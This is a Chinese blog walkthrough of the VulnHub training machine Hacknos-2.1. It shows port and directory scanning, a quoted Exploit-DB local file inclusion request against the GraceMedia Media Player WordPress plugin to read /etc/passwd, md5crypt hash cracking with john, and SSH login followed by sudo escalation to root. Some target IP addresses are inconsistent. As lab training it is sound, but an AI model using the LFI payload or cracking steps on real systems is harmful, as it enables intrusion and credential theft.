靶机Hacknos-2.1

于 2022-02-21 21:20:13 发布
阅读量1.3k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_50815573/article/details/123055398
版权

靶机地址

https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/#

目标为 普通用户的user.txt和root用户的root.txt

第一步现将我们下载好的靶机导入到VirtualBox中启动靶机

第二步,打开我们的kali

使用 nmap -sP 192.168.1.0/24 搜索内网或者的主机

找到我们的目标靶机ip,

这里有个技巧,通过VirtualBox  >>设置 >>网络 >> 高级 >> 看到靶机的MAC地址,根据MAC地址来找目标靶机ip

 下一步找到,ip后  使用nmap -sV 192.168.1.213 -O 命令来扫描该ip地址开放的端口   

可以看出  开放的 22 端口和80端口

 步骤二:通过浏览器访问80端口发现为Apache安装默认页面使用dirsearch进行目录扫描...发现tsweb目录为WordPress站点...

git clone git://github.com/maurosoria/dirsearch    //dirsearch项目地址

dirsearch http://192.168.1.213/       或者
./dirsearch.py -u http://192.168.213/           // 进入dirsearch目录输入这条命令

得到一个http://192.168.5.133/tsweb/,在浏览器中访问它

 步骤三:使用wpscan工具进行漏洞扫描...

wpscan --url http://192.168.1.185/tsweb -e ap

步骤四:通过以上的扫描结果到Exploit-DB中进行查找漏洞利用方法,可以查看该漏洞可以查看具有此漏洞机器上的passwd文件内容

发现有漏洞的插件GraceMedia Media Player

https://www.exploit-db.com/exploits/46537     //漏洞地址
The following URL have been confirmed that is vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT

z

将GET下面的字符串拼接在网页后面

将内容复制并保存到本地 test文件中

步骤五:通过查看passwd文件可以看到flag用户加密值给出来并保存到本地文件中通过john进行破解...

echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash' > test
gunzip /usr/share/wordlists/rockyou.txt.gz
john test --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt

步骤六:破解flag密码为topsecret并进行SSH登录...并查找passwd文件中使用bash登录的用户为rohit并进行目录遍历发现该用户密码...

ssh flag@192.168.1.213 登录

密码为 topsecret

登录之后查看

cat /etc/passwd | grep bash

将查看到的内容复制到本地 test2文件中
cat /var/backups/passbkp/md5-hash

将这个密码替换掉上面内容中第一个x

然后保存到文件test2中

也可以用命令

步骤七:对rohit用户进行解密...并获取密码!%hack41 切换到rohit用户...

echo 'rohit:$1$rohit$01Dl0NQKtgfeL08fGrggi0:1000:1000:hackNos:/home/rohit:/bin/bash' > test2
john test2 --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt        //进行解码耐心等一下

 得到密码 ssh rohit@192.168.1.213  也可以在刚才的 flag用户下输入  su  rohit进行切换用户

步骤八:切换到rohit用户进入家目录发现user.txt发现当前用户具有sudo权限切换并进入到root用户家目录获取root.txt

su rohit
cd 
ls
cat user.txt
sudo su root
cd
ls
cat root.txt
 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值